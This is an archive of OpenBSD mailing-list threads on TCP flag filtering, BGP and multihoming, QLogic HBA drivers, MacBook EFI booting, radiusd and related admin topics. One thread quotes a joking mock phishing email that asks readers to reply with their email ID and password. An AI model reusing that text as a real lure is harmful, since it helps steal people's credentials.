Their "security through ignorance" practices are nearly as illustrious as their "business through abusive lending" practices. The thing to remember is the security facade they require is almost entirely for the sake of public confidence and litigation defense. --hmmm... I should probably save the rest of this rant for a far more appropriate mailing list, like /dev/null

Anyhow, back to the original question, "are there any ramifications to
blocking SYN+FIN completely?"

Some (Darren Reed, ipf author) think that pf unconditionally clearing the FIN flag on scrub is a bug, And no, we don't need a flame war about whether or not Darren is "right," but none the less, it's still good to see how the RFC's and ideas about "correct" filtering are both subject to lots of interpretation.
http://www.derkeiler.com/Mailing-Lists/FreeBSD-Security/2005-07/0011.html

I know SYN+FIN is a valid packet according to RFC 793 and 1644 (T/TCP), but the more important question is, "what are the valuable *uses* for SYN+FIN packets?"

Personally, I can't think of any valuable uses. Can you?

Just because SYN+FIN is a technically valid packet according to the
various RFC's doesn't mean we want or need such traffic, and doesn't
mean we consider it valuable and useful. Can you think of any RFC
valid traffic you're dropping when the RFC's tell you that you're
supposed to respond to it?  --Ya, I thought so.

Spammers? --Yep, RFC valid traffic.
DDOS? --Yep, RFC valid traffic.
Brute Force? --Yep, RFC valid traffic.
port scans --A lot of it is RFC valid traffic.

Though 'scrub' will drop the FIN flag off the SYN+FIN packets, the bofhish instinct says without a proven and valuable *use* for SYN+FIN, then just block it. If anyone complains about breakage, then just point your (middle) finger at PCI/TrustKeeper compliance requirements, and tell the user to take it up with them.

Call me overly pragmatic, but if something in a standard is not
providing valuable use (i.e. reward) and poses *any* type of risk or
cost (including the risk and cost of wasting my time filing and
maintaining some appeal), then the answer is painfully simple.

--
J.C. Roberts




Re: feature request OpenBGPD: route server ability to disable best path selection

2009-03-19 Thread Pete Vickers
The 'standard' (for at least one vendor's definition of standard) way to get around this, is to slap a different route distinguisher (RD) on each of the desired 'duplicate' paths. BGP then sees these as individual paths and will happily communicate both concurrently.


Separate but related, is the ability to import both RD's into the same VRF on the recipient of the BGP peering, and thus into the routing table (FIB) to use multiple paths (load balancing) etc.



/Pete


On 18 Mar 2009, at 11:32, Claudio Jeker wrote:


On Wed, Mar 18, 2009 at 11:00:32AM +0100, Arnoud Vermeer wrote:

I have a problem with filtering on the current route server
implementation. I currently have the following setup:


* 10.0.1.0/24   10.0.1.0/24


+---+   +---+
|AS1|   |AS2|
| 10.0.0.50 |   | 10.0.0.51 |
+---+   +---+
   |   |
   |   |
   +---+---+---+
   | RS|
   | 10.0.0.49 |
   +-+-+
 |
 |deny to { 10.0.0.52 } AS 1
 |
   +-+-+
   |AS3|
   | 10.0.0.52 |
   +---+

(or http://www.freshway.biz/files/20090318-problem-filter.txt for the
correct ASCII)

Both AS1 and AS2 announce the same prefix, but the route server selects the AS1 path because of the lower nexthop value. Now I add a filter to AS3. I deny to send any prefixes to AS3 that match AS1. Now AS3 doesn't receive the 10.0.1.0/24 prefix at all. It should however receive it from AS2.

Quagga overcomes this problem by making a per-filtered-peer RIB and then do best path selection (http://www.quagga.net/docs/docs-multi/Description-of-the-Route-Server-model.html). I think this is just an ugly and complicated work-around as it doesn't solve the core of the problem.

In my eyes the best solution will be to disable the best-path-selection on the route server altogether, and send all routes (except the filtered) to the peer.

Arguments to do this:
- As shown above, the best path selection breaks on the route server when applying filters.
- A route server should not make any best-path selection, because the peers criteria could be completely different than the route server.
- The function of the route server is to 'collect' all the routes and send them to all of the peers, not to 'collect a subset' of the routes and send that to its peers.

I would love to hear your thoughts on this subject. Would it be hard to implement this feature?



BGP only supports one path per prefix and peer. If you send multiple ones as you propose the later ones will overwrite the first one no matter what. To support your idea we would need a per-filtered-peer local-RIB because the route-server needs to do the best path selection for the peer.

--
:wq Claudio




Re: European orders

2009-03-25 Thread Pete Vickers
A public statement from him (Wim) would be appropriate now I believe. Especially informing all of us who have pre-ordered the latest release via him what will happen with our orders, and importantly when he will forward the proceeds to Theo et al.



/Pete


On 25 Mar 2009, at 01:16, Floor Terra wrote:

On Wed, Mar 25, 2009 at 12:34 AM, Theo de Raadt wrote:

Do you have any advice for those who already ordered? Or should we contact the distributor?


Sorry, but I don't know that yet.  We'll see, I suppose.



Wim called me 20 minutes ago and explained the situation to me.
If you have any questions just mail him or give him a call.

--
Floor Terra 
www: http://brobding.mine.nu/




correction to gre(4) man page

2009-04-12 Thread Pete Vickers
SEE ALSO section, entry for Web Cache Coordination Protocol V1.0, link is broken. A suitable replacement is:


http://www.ietf.org/proceedings/99jul/I-D/draft-ietf-wrec-web-pro-00.txt


/Pete



Re: correction to gre(4) man page

2009-04-13 Thread Pete Vickers

On 12 Apr 2009, at 23:47, Jason McIntyre wrote:


On Sun, Apr 12, 2009 at 10:40:08PM +0200, Pete Vickers wrote:
SEE ALSO section, entry for Web Cache Coordination Protocol V1.0, link is broken. A suitable replacement is:

http://www.ietf.org/proceedings/99jul/I-D/draft-ietf-wrec-web-pro-00.txt


/Pete


that link works fine here.
jmc



ahh, indeed. The culprit was the man->html conversion for this:
http://www.openbsd.org/cgi-bin/man.cgi?query=gre
where the URL is line wrapped, but the html does not take it into account.


thanks for pointing it out.

/Pete



Re: MPLS status questions.

2009-04-30 Thread Pete Vickers

On 30 Apr 2009, at 00:14, Daniel Ouellet wrote:


Joe S wrote:
What's really frustrating here are the network admins I work with that are trying to migrate from ipsec vpns to MPLS because it's "easier" and "just as secure".


Well, I am not sure that it would be very convincing to them, but I guess a somewhat good argument to use might be as simple as asking them if they would replace IPSec tunnel/VPN on a big switch WAN/LAN network with only VLan tag instead?


That's about what they say isn't it? Scary.

May not be a very good example, but I think the analogy between them is somewhat valuable in idea and concept anyway.


But again, the norm looks like these days is to only consider security after the fact and react to it instead of being proactive on it.


See what they say.

Best,

Daniel





You don't use telnet even over an IPSec WAN do you ? End-to-end security (e.g. TLS/SSL) is your friend here. It's the only way to actively verify link security.


And once you're in an SSH session (with properly verified keys), you don't care who's watching the stream.


/Pete



Re: IMPORTANT, DO THIS OR YOUR E-MAIL WON'T WORK

2009-05-27 Thread Pete Vickers

On 27 May 2009, at 10:01, Otto Moerbeek wrote:


On Wed, May 27, 2009 at 09:43:18AM +0200, Otto Moerbeek wrote:


On Wed, May 27, 2009 at 10:29:10AM +0300, Gregory Edigarov wrote:


Bob Beck wrote:

* Chris Harries  [2009-05-26 10:48]:

it sure beats everyone moaning at me as they cannot read e-mails clearly marked IMPORTANT, DO THIS OR YOUR E-MAIL WONT WORK, then moaning when their email doesn't work



IMPORTANT, DO THIS OR YOUR E-MAIL WON'T WORK

We are refreshing our openbsd mailing lists to ensure that the list memberships correctly match our business process and security roles.


In order to ensure your list memberships and email continue to work
without interruption, please reply to this email with the following
information:


Name : ___


Email ID: 


Password: 


Thanks for helping to ensure the integrity of our email system.




Pardon? I do not understand what is this for


explanation will follow once you provide the neccesary provide of


ehhh s/provide/proof


authentication.

-Otto




I seriously thought you'd done the typo deliberately to mimic the poor  
english typically found in such fraud emails. LoL.


/Pete



Re: BGP and NATting to multiple ISPs

2009-06-18 Thread Pete Vickers

On 18. juni. 2009, at 19.45, Karl O. Pinc wrote:




What's the best way to solve this problem?



stop trying to bodge it, and get some PI space.

/Pete



Re: BGP and NATting to multiple ISPs

2009-06-18 Thread Pete Vickers
nah, you may be right technically with the data-center argument, but not politically. Everyone has the 'right' to proper redundancy for H/A if they want/need it. Actually, the sooner the IPv4 space gets used up the better, then everyone will have to migrate to IPvShit, and be done with it.


/Pete



On 18. juni. 2009, at 22.49, tico wrote:


Karl O. Pinc wrote:

On 06/18/2009 01:50:17 PM, Pete Vickers wrote:


On 18. juni. 2009, at 19.45, Karl O. Pinc wrote:




What's the best way to solve this problem?



stop trying to bodge it, and get some PI space.


I'd love but, how can I justify to ARIN a large enough address
block that it won't be dropped by BGP administrators?
The only reason we'd need the addresses is to muti-home.
ARIN says you can get a /22 for multihoming if you can justify their 25% / 50% usage as spelled out in their numbering policy.

https://www.arin.net/policy/nrpm.html#four322

If you can't justify that, then get a /24 of PA space from a provider that *will* allow you to reannounce that /24 via an additional transit and *will* provide you with an LOA that you can provide to that additional transit operator.


The number of networks that filter prefixes smaller than /22 don't appear to be that numerous IMHO, but if they do, your /24 will still be reachable as they'll see the larger /19 or whatever from your provider that it's carved out of.

I am under the impression this is not reason enough for ARIN, that they are in a rationing mood when it comes to handing out IPv4 address blocks.

As well they should be. IP resources are scarce and people are wasteful and greedy.
Most offices don't need BGP multihoming, or any sort of inbound multihoming at all-- just outbound which is easily done without the assistance of the ISPs themselves or ARIN by using NAT and upstream-failover features commonly found in most routers.
Most world-accessible servers that are important enough to need inbound multihoming should be sitting in a datacenter which has significantly more professionally-managed multihoming than small offices.


And before the flaming starts, remember that I said "most."
Cheers,
Tico


Karl 
Free Software:  "You don't pay back, you pay forward."
-- Robert A. Heinlein




Re: BGP and NATting to multiple ISPs

2009-06-19 Thread Pete Vickers

On 19. juni. 2009, at 00.10, Henning Brauer wrote:


* Pete Vickers  [2009-06-19 00:02]:

Actually, the sooner the IPv4 space gets used up the better, then everyone will have to migrate to IPvShit, and be done with it.


that doesn't solve a single problem.
in return, you get a plethora of new ones on top.

--
Henning Brauer, h...@bsws.de, henn...@openbsd.org
BS Web Services, http://bsws.de
Full-Service ISP - Secure Hosting, Mail and DNS Services
Dedicated Servers, Rootservers, Application Hosting - Hamburg & Amsterdam




Once 'everyone' is solely 'on' v6, then v4 space not a concern.

As lots of folks (and I'm one of them) here point out v6 has many many issues, but premature v4 exhaustion / v6 migration, would force these issues to be resolved a lot quicker.



/Pete



Re: BGP and NATting to multiple ISPs

2009-06-19 Thread Pete Vickers

On 19. juni. 2009, at 00.40, Ted Unangst wrote:

On Thu, Jun 18, 2009 at 5:54 PM, Pete Vickers wrote:
nah, you may be right technically with the data-center argument, but not politically. Everyone has the 'right' to proper redundancy for H/A if they want/need it. Actually, the sooner the IPv4 space gets used up the better, then everyone will have to migrate to IPvShit, and be done with it.


oh really?  people are going to start carrying /48s in a world where
they don't even carry anything more than a /24 for ipv4?



admins who filter >= /24 and don't set a default to upstream [1], generally get what they deserve - since they are blackholing potential customers.


If their employer is so cash strapped they can't afford the ASIC space for a full table, then presumably their market share & b/w usage are such that they can hold the table in software instead. (dumb north american routing policies excepted)




[1] Or 0.0.0.0/1 and 128.0.0.0/1 across links, or somesuch.


/Pete



sole instance of a process

2014-11-20 Thread Pete Vickers
Hi,

I suspect this may be the wrong list for this question. However although 
strictly it's a Bourne shell script query, it only seems to act up under OpenBSD 
(for me).

Essentially I have a job which needs to be run periodically. So I have a shell 
script to do the necessary commands, and this is scheduled via (root's) crontab.
It is however very important that multiple instances of the job are not run 
concurrently (e.g. if a previous invocation hung), and so the script should 
detect this upon invocation before proceeding.

I don't want a single long running job (which could e.g. sleep between loops) 
for various reasons. And I also don't like PID files and other fragile locking 
hacks.


So down to business, below is the gist of my script. Most of the time it 
appears to run fine. However occasionally (once every couple of days?) it 
reports via email that a duplicate process is detected, but the included ps 
listing shows no other instance. I don't believe that this is just due to an 
old instance exiting in the small time window between the pgrep and the ps 
invocations.  So basically I guess there is an error in my script or its 
logic, or something else I'm not seeing.

Any hit with the clue bat gratefully received.



#!/bin/sh
#
#
SHOUT="/usr/bin/logger -i -t MYPERIODICJOB"
#
#
# Ensure another instance of this is not running
#
MYNAME=`basename $0`
MYPID=$$
#
/usr/bin/pgrep -fu root $MYNAME | /usr/bin/grep -v $MYPID && \
{
	$SHOUT "HELP - duplicate process detected $?" ; \
	ps -axjwww | mail -s "HELP MYPERIODICJOB $MYPID $MYNAME $PPID" m...@example.com ; \
	exit 1 ;
}

#
#
# starting doing useful stuff here..
#


Disclaimer: I know my scripting is far from optimal...


/Pete
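An added example, not Pete's script and not anything from OpenBSD base: the same cron-driven single-instance guard, but built on an atomic mkdir(2) lock instead of pattern-matching the process table with pgrep -f. The lock directory path, the reuse of the MYPERIODICJOB logger tag, and running as root from cron (so kill -0 can probe any holder PID) are assumptions.

```shell
#!/bin/sh
# Added example (not from the original post). Why not pgrep -f: each stage
# of a shell pipeline is fork()ed and, until it exec()s, still shows the
# parent's command line ("/bin/sh ./myjob"), so a scan for the script name
# can momentarily see a "second" instance that is really the grep about to
# start. A directory created with mkdir(2) is atomic and has no such window.
# LOCKDIR is an assumption; override it in the environment if needed.
LOCKDIR="${LOCKDIR:-${TMPDIR:-/tmp}/myperiodicjob.lock}"

# acquire_lock: returns 0 if this process now holds the lock, 1 if a live
# holder exists. A lock whose recorded holder PID no longer exists (crash,
# kill -9) is treated as stale and reclaimed.
acquire_lock() {
    if mkdir "$LOCKDIR" 2>/dev/null; then
        echo "$$" > "$LOCKDIR/pid"
        return 0
    fi
    holder=$(cat "$LOCKDIR/pid" 2>/dev/null)
    # kill -0 sends no signal; it only tests whether the PID exists. An
    # empty pid file means another instance is between its mkdir and echo,
    # so be conservative and treat that as a live holder too (a missed run
    # is cheaper than a double run).
    if [ -z "$holder" ] || kill -0 "$holder" 2>/dev/null; then
        return 1
    fi
    # Stale lock: rename(2) it away (atomic, so only one reclaimer wins the
    # rename) and then compete for a fresh mkdir. Two instances that both
    # read the same dead PID at the same instant can still race here; for a
    # job fired from cron every few minutes that window is a few syscalls.
    if mv "$LOCKDIR" "$LOCKDIR.stale.$$" 2>/dev/null; then
        rm -rf "$LOCKDIR.stale.$$"
    fi
    mkdir "$LOCKDIR" 2>/dev/null || return 1
    echo "$$" > "$LOCKDIR/pid"
    return 0
}

# release_lock: only the recorded holder removes the directory, so a late
# release from an instance that never got the lock cannot delete another
# instance's lock.
release_lock() {
    [ "$(cat "$LOCKDIR/pid" 2>/dev/null)" = "$$" ] && rm -rf "$LOCKDIR"
    return 0
}

# run_job: the original script's flow with the guard swapped in. The useful
# work is passed as a command ("run_job /usr/local/bin/dothework") so the
# function can be exercised without side effects.
run_job() {
    if ! acquire_lock; then
        logger -i -t MYPERIODICJOB \
            "duplicate instance detected, holder pid $(cat "$LOCKDIR/pid")"
        return 1
    fi
    trap 'release_lock' EXIT INT TERM   # drop the lock even if the job dies
    "$@"
    rc=$?
    release_lock
    trap - EXIT INT TERM
    return $rc
}
```

The PID-reuse caveat of any pidfile scheme still applies: if a dead holder's PID is later handed to an unrelated long-lived process, the lock looks live until someone removes the directory by hand.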



'newer' Qlogic HBA support on amd64

2014-03-13 Thread Pete Vickers
Hi,
I have an amd64 server (HP DL360 G5), with a Qlogic FC HBA in it. It appears 
to be based on the ISP2400 series, and the isp man page says the driver only 
supports up to the ISP2300 series. However the driver appears to try to attach 
the device irrespective (and fail). Does anyone know how different the 2400 
series are, or if there is work in progress to support them ?

thanks

/Pete

Some relevant info below:


$ dmesg | grep isp0
isp0 at pci8 dev 0 function 0 "QLogic ISP2432" rev 0x02: apic 8 int 17
isp0: Polled Mailbox Command (0x8) Timeout (10us)
isp0: Polled Mailbox Command (0x8) Timeout (10us)
isp0: Mailbox Command 'ABOUT FIRMWARE' failed (TIMEOUT)


# pcidump -v 19:0:0
 19:0:0: QLogic ISP2432
0x: Vendor ID: 1077 Product ID: 2432
0x0004: Command: 0147 Status ID: 0010
0x0008: Class: 0c Subclass: 04 Interface: 00 Revision: 02
0x000c: BIST: 00 Header Type: 00 Latency Timer: 00 Cache Line Size: 10
0x0010: BAR io addr: 0x5000/0x0100
0x0014: BAR mem 64bit addr: 0xfdff/0x4000
0x001c: BAR empty ()
0x0020: BAR empty ()
0x0024: BAR empty ()
0x0028: Cardbus CIS: 
0x002c: Subsystem Vendor ID: 103c Product ID: 7040
0x0030: Expansion ROM Base Address: 
0x0038: 
0x003c: Interrupt Pin: 01 Line: 07 Min Gnt: 00 Max Lat: 00
0x0044: Capability 0x01: Power Management
0x004c: Capability 0x10: PCI Express
Link Speed: 2.5 / 2.5 GT/s Link Width: x4 / x4
0x0064: Capability 0x05: Message Signaled Interrupts (MSI)
0x0074: Capability 0x03: Vital Product Data (VPD)
0x007c: Capability 0x11: Extended Message Signaled Interrupts (MSI-X)


$ dmesg | head  


OpenBSD 5.3 (GENERIC.MP) #62: Tue Mar 12 18:21:20 MDT 2013
dera...@amd64.openbsd.org:/usr/src/sys/arch/amd64/compile/GENERIC.MP


# sysctl hw  
hw.machine=amd64
hw.model=Intel(R) Xeon(R) CPU E5420 @ 2.50GHz
hw.ncpu=4
hw.byteorder=1234
hw.pagesize=4096
hw.disknames=sd0:20008a7ae6c37c52,cd0:
hw.diskcount=2
hw.sensors.cpu0.temp0=37.00 degC
hw.sensors.cpu1.temp0=37.00 degC
hw.sensors.cpu2.temp0=37.00 degC
hw.sensors.cpu3.temp0=37.00 degC
hw.sensors.acpitz0.temp0=8.30 degC (zone temperature)
hw.sensors.ciss0.drive0=online (sd0), OK
hw.cpuspeed=2500
hw.setperf=100
hw.vendor=HP
hw.product=ProLiant DL360 G5
hw.physmem=4292161536
hw.usermem=4292136960
hw.ncpufound=4
hw.allowpowerdown=1



Re: 'newer' Qlogic HBA support on amd64

2014-05-16 Thread Pete Vickers
Hi,

Sorry for the delay. I finally upgraded the box (very quick and easy process - 
nice ) and the HBA is now attached by the qle driver. However whilst it 'sees' 
the SAN disk behind it, it remains unable to talk to it.
 

# uname -mrv 
5.5 GENERIC.MP#315 amd64


# dmesg | egrep -i "qle|scsibus1"
qle0 at pci8 dev 0 function 0 "QLogic ISP2432" rev 0x02: msi
qle0: bad startup mboxes: 0 0
qle0: firmware rev 4.0.20, attrs 0x2
scsibus1 at qle0: 2048 targets, WWPN 50060b66644e, WWNN 50060b66644f
sd1 at scsibus1 targ 130 lun 0:  SCSI2 0/direct fixed naa.600601601b662700d837603da8efe011
sd2 at scsibus1 targ 131 lun 0:  SCSI2 0/direct fixed naa.600601601b662700d837603da8efe011


sd1 & sd2 : Are these duplicates due to redundant paths in SAN fabric ?


# fdisk sd1 
fdisk: DIOCGPDINFO: Input/output error
fdisk: Can't get disk geometry, please use [-chs] to specify.



# pcidump  -v 19:0:0
 19:0:0: QLogic ISP2432
0x: Vendor ID: 1077 Product ID: 2432
0x0004: Command: 0147 Status: 0010
0x0008: Class: 0c Subclass: 04 Interface: 00 Revision: 02
0x000c: BIST: 00 Header Type: 00 Latency Timer: 00 Cache Line Size: 10
0x0010: BAR io addr: 0x5000/0x0100
0x0014: BAR mem 64bit addr: 0xfdff/0x4000
0x001c: BAR empty ()
0x0020: BAR empty ()
0x0024: BAR empty ()
0x0028: Cardbus CIS: 
0x002c: Subsystem Vendor ID: 103c Product ID: 7040
0x0030: Expansion ROM Base Address: 
0x0038: 
0x003c: Interrupt Pin: 01 Line: 07 Min Gnt: 00 Max Lat: 00
0x0044: Capability 0x01: Power Management
0x004c: Capability 0x10: PCI Express
Link Speed: 2.5 / 2.5 GT/s Link Width: x4 / x4
0x0064: Capability 0x05: Message Signaled Interrupts (MSI)
0x0074: Capability 0x03: Vital Product Data (VPD)
0x007c: Capability 0x11: Extended Message Signaled Interrupts (MSI-X)

e.g. http://filedownloads.qlogic.com/files/datasheets/32359/83432-580-00D.pdf



(let me know if you want list spam with full dmesg).


/Pete


On 13. mars 2014, at 18:48, Ted Unangst  wrote:

> On Thu, Mar 13, 2014 at 18:44, Pete Vickers wrote:
>> Hi,
>> I have an amd64 server (HP DL360 G5), with a Qlogic FC HBA in it. It
>> appears to be based on the ISP2400 series, and the isp man page says the
>> driver only supports up to the ISP2300 series. However the driver appears
>> to try to attach the device irrespective (and fail). Does anyone know how
>> different the 2400 series are, or if there is work in progress to support
>> them ?
> 
> In 5.5 and later, that's supported by the qle driver. The isp driver
> is being broken into parts (qlw, qla, qle) depending on generation.
> I'd try a snapshot. It should work better. And if it doesn't work,
> we'd like to know.



External monitor issue with EFI & MacBook

2016-09-24 Thread Pete Zabagel
Hello all, 

I'm having issues installing OpenBSD 6.0 (-current) on my old Apple
MacBook (Early 2008). The builtin screen is broken so I'm using a 
mini-DVI to VGA connector and external monitor to do the install. I'm 
under the impression that it's better to install / boot from EFI instead
of the BIOS mode because the computer won't display the SATA controller
in BIOS mode but will in EFI mode. I don't know if this is actually
true or not but I remember something on undeadly.org about a dev's 
experience with a MacBook Air with a similar story.

Anyways, so I do the install as a BIOS boot and it works just fine. I
did the GPT route and rebooted. Now if the laptop lid is open it boots 
just fine (but I need to boot the Mac with it closed so the external
video starts) but if the lid is closed it will boot until this line:

efifb at mainbus0 not configured

and then the screen goes blank. I believe it's a hang too; I set up
networking and was unable to ping it after it should have booted up.

With the screen open however, it boots up just fine. I've included a
full dmesg from a successful boot below.

I've tried enabling verbose mode in boot -c but it seems the graphics
drivers don't initialize until after that (I just get a blank screen).
With config -e I've tried to turn off a few features (efifb, uvideo,
etc.) with no luck.

My feeling is the graphics drivers don't see the attached external
screen or there is a failure handing off between the EFI and the
kernel, but I'm not really sure.

Can someone try to recreate this issue? (Boot up an amd64 Mac with lid
closed in EFI mode.) Also, does anyone have a guess as to where the code
might be that controls this? I want to take a look before I file a
formal bug report.

Thanks, 

Pete Zabagel

OpenBSD 6.0-current (GENERIC.MP) #2480: Wed Sep 21 11:18:24 MDT 2016
    dera...@amd64.openbsd.org:/usr/src/sys/arch/amd64/compile/GENERIC.MP
real mem = 2107633664 (2009MB)
avail mem = 2039320576 (1944MB)
mpath0 at root
scsibus0 at mpath0: 256 targets
mainbus0 at root
bios0 at mainbus0: SMBIOS rev. 2.4 @ 0x7eec3000 (41 entries)
bios0: vendor Apple Inc. version "MB41.88Z.00C1.B00.0802091535" date 02/09/08
bios0: Apple Inc. MacBook4,1
acpi0 at bios0: rev 2
acpi0: sleep states S0 S3 S4 S5
acpi0: tables DSDT FACP HPET APIC MCFG ASF! SBST ECDT SSDT SSDT SSDT SSDT
acpi0: wakeup devices ADP1(S3) LID0(S3) ARPT(S3) GIGE(S3) UHC1(S3) UHC2(S3) UHC3(S3) UHC4(S3) UHC5(S3) EHC1(S3) EHC2(S3) EC__(S3)
acpitimer0 at acpi0: 3579545 Hz, 24 bits
acpihpet0 at acpi0: 14318179 Hz
acpimadt0 at acpi0 addr 0xfee0: PC-AT compat
cpu0 at mainbus0: apid 0 (boot processor)
cpu0: Intel(R) Core(TM)2 Duo CPU T8300 @ 2.40GHz, 1197.21 MHz
cpu0: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CV,PAT,PSE36,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,PBE,SSE3,DTES64,MWAIT,DS-CPL,VMX,EST,TM2,SSSE3,CX16,xTPR,PDCM,SSE4.1,NXE,LONG,LAHF,PERF,SENSOR
cpu0: 3MB 64b/line 8-way L2 cache
cpu0: smt 0, core 0, package 0
mtrr: Pentium Pro MTRR support, 8 var ranges, 88 fixed ranges
cpu0: apic clock running at 199MHz
cpu0: mwait min=64, max=64, C-substates=0.2.2.2.2.1.3, IBE
cpu1 at mainbus0: apid 1 (application processor)
cpu1: Intel(R) Core(TM)2 Duo CPU T8300 @ 2.40GHz, 1197.00 MHz
cpu1: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,PBE,SSE3,DTES64,MWAIT,DS-CPL,VMX,EST,TM2,SSSE3,CX16,xTPR,PDCM,SSE4.1,NXE,LONG,LAHF,PERF,SENSOR
cpu1: 3MB 64b/line 8-way L2 cache
cpu1: smt 0, core 1, package 0
ioapic0 at mainbus0: apid 1 pa 0xfec0, version 20, 24 pins
acpimcfg0 at acpi0 addr 0xf000, bus 0-255
acpiec0 at acpi0
acpiprt0 at acpi0: bus 0 (PCI0)
acpiprt1 at acpi0: bus 2 (RP05)
acpiprt2 at acpi0: bus 3 (RP06)
acpiprt3 at acpi0: bus 4 (PCIB)
acpicpu0 at acpi0: !C3(100@57 mwait.3@0x31), !C2(500@1 mwait@0x10), C1(1000@1 mwait), PSS
acpicpu1 at acpi0: !C3(100@57 mwait.3@0x31), !C2(500@1 mwait@0x10), C1(1000@1 mwait), PSS
acpiac0 at acpi0: AC unit online
acpibtn0 at acpi0: LID0
"APP0002" at acpi0 not configured
acpibtn1 at acpi0: PWRB
acpibtn2 at acpi0: SLPB
"APP0001" at acpi0 not configured
"APP0003" at acpi0 not configured
"ACPI0002" at acpi0 not configured
acpibat0 at acpi0: BAT0 not present
acpivideo0 at acpi0: GFX0
cpu0: Enhanced SpeedStep 1197 MHz: speeds: 2400, 2200, 2000, 1800, 1600, 1400, 1200, 800 MHz
pci0 at mainbus0 bus 0
pchb0 at pci0 dev 0 function 0 "Intel GM965 Host" rev 0x03
inteldrm0 at pci0 dev 2 function 0 "Intel GM965 Video" rev 0x03
drm0 at inteldrm0
intagp0 at inteldrm0
agp0 at intagp0: aperture at 0x8000, size 0x1000
inteldrm0: msi
inteldrm0: 1280x800
wsdisplay0 at inteldrm0 mux 1: console (std, vt100 emulation)
wsdisplay0: screen 1-5 added (std, vt100 emulation)
"Intel GM965 Video" rev 0x03 at pci0 dev 2 function 1 not configured
uhci0 at pci0 dev 26 function 0

non-PAP in radiusd

2017-01-09 Thread Pete Zabagel
Hello friends,

I noticed in the radiusd.conf man page that the bsdauth module only
supports PAP:

"It only supports PAP, password based authentication."

Is there a specific reason as to why CHAP isn't implemented? I am
assuming it is due to time / interest constraints but perhaps the
quality of CHAP is in question too -- I see in the RFC that MD5 is
assigned a specific value, making me wonder if MD5 is the predominant
algorithm of CHAP implementations in the wild and perhaps considered
insecure by the community.

On a side note, does anyone know which algorithms are used in CHAP
besides MD5?

Thanks,

Pete
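As an added illustration (not part of the original post or of radiusd), here is the MD5 response defined in RFC 1994 and the way RFC 2865 carries it in the RADIUS CHAP-Password attribute; the point relevant to the bsdauth question is that the verifier must recompute the hash from the cleartext secret, which a store holding only one-way password hashes cannot do. The PAP contrast function and the salted-SHA-256 store are constructed for this example and stand in for whatever a real password backend uses.

```python
"""CHAP-MD5 response (RFC 1994) as carried in RADIUS (RFC 2865, section 5.3).

Added example, not part of radiusd; shows why a CHAP verifier needs the
cleartext secret, whereas a PAP verifier can work from a one-way hash.
"""
import hashlib
import hmac


def chap_md5_response(ident, secret, challenge):
    """Client side (RFC 1994): MD5 over Identifier || secret || Challenge Value."""
    if not 0 <= ident <= 255:
        raise ValueError("CHAP Identifier is a single octet")
    return hashlib.md5(bytes([ident]) + secret + challenge).digest()


def radius_chap_password(ident, secret, challenge):
    """Value of the RADIUS CHAP-Password attribute: 1 octet Ident + 16 octet response."""
    return bytes([ident]) + chap_md5_response(ident, secret, challenge)


def chap_challenge(request_authenticator, chap_challenge_attr=None):
    """RFC 2865: the challenge is the CHAP-Challenge attribute if present,
    otherwise the 16-octet Request Authenticator of the Access-Request."""
    return chap_challenge_attr if chap_challenge_attr is not None else request_authenticator


def verify_chap_password(attr_value, challenge, cleartext_secret):
    """Server side: recompute the response from the stored cleartext secret.
    This cannot be done from a one-way hash of the secret, which is why a
    hashed-password backend can only offer PAP."""
    if len(attr_value) != 17:
        return False
    ident, response = attr_value[0], attr_value[1:]
    expected = chap_md5_response(ident, cleartext_secret, challenge)
    return hmac.compare_digest(expected, response)


def verify_pap_against_hash(password, salt, stored_hash):
    """PAP contrast: the server receives the password itself (after the RADIUS
    User-Password decryption, not shown), so it can hash it with the stored
    salt and compare against a one-way hash. Salted SHA-256 is a constructed
    stand-in for whatever the password store really uses."""
    return hmac.compare_digest(hashlib.sha256(salt + password).digest(), stored_hash)


def demo():
    """Constructed sample values; returns (chap_ok, chap_wrong_secret, pap_ok)."""
    secret = b"correct horse battery staple"   # constructed shared secret
    req_auth = bytes(range(16))                 # constructed Request Authenticator
    attr = radius_chap_password(7, secret, chap_challenge(req_auth))
    store = hashlib.sha256(b"salt" + secret).digest()   # PAP-style hashed store
    return (
        verify_chap_password(attr, req_auth, secret),
        verify_chap_password(attr, req_auth, b"wrong secret"),
        verify_pap_against_hash(secret, b"salt", store),
    )
```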



Re: OpenBSD 6.1 Release

2017-03-01 Thread Pete Zabagel
Since 6.1 will be the first release in our "twentieth year" I hope the
foundation offers installation service where Theo shows up in a limousine
wearing a tuxedo and installs 6.1 for the princely sum of $10,000.

What do you say Theo?

-PZ

From: owner-m...@openbsd.org on behalf of tec...@protonmail.com
Sent: March 1, 2017 12:07:45 PM
To: Theo de Raadt; misc@openbsd.org
Subject: Re: OpenBSD 6.1 Release

I was counting from last release on Sept 1st, my apologies.

> Wondering if anyone knows about the new release schedule? It has
> always been 6 months of course, so I presumed today would be the
> day. Probably just a little impatient and excited for this one.

Releases are generally near start of May and November.



Re: OpenBSD 6.1 Release

2017-03-01 Thread Pete Zabagel
Oh, and he needs to port it to my TAM* and stay for fancy hors d'oeuvres (beef
jerky, pop tarts and whiskey).

*http://guides.macrumors.com/Twentieth_Anniversary_Macintosh



Re: is it possible to speed up network to 1 Gb ?

2017-03-01 Thread Pete Zabagel
> The more complex the protocol, the slower the transfer.
> 85 MB/sec sounds about right for ftp in my opinion, samba may need some
> performance tuning.

Yep, I would recommend when tuning Samba to not just throw a bunch of
optimizations in there and expect it to work magically. It's better to test
with just a few (or even 1) modification first and work from there.

OpenBSD can be a little slower but the trade off for better security is worth
it IMHO.

If you're going between Linux and OpenBSD, NFS would also be an option (not
without its own tuning difficulties at times).

Remember you can tune Samba but you can't tune-a-fish!

-PZ



Re: Why isn't OpenBSD in Google Summer of Code 2017?...

2017-04-04 Thread Pete Zabagel
Would the devs consider compiling a list of specific improvements they'd like
to see volunteer'd upon this summer? I'd love to help especially if it was a
group effort/friendly competition.


From: owner-m...@openbsd.org on behalf of Bob Beck
Sent: April 2, 2017 10:16:21 PM
To: Luke Small
Cc: openbsd-misc
Subject: Re: Why isn't OpenBSD in Google Summer of Code 2017?...

We tried it for two years; it was too much effort on the part of the
foundation organizers and mentors to deal with the bureaucracy involved, and we
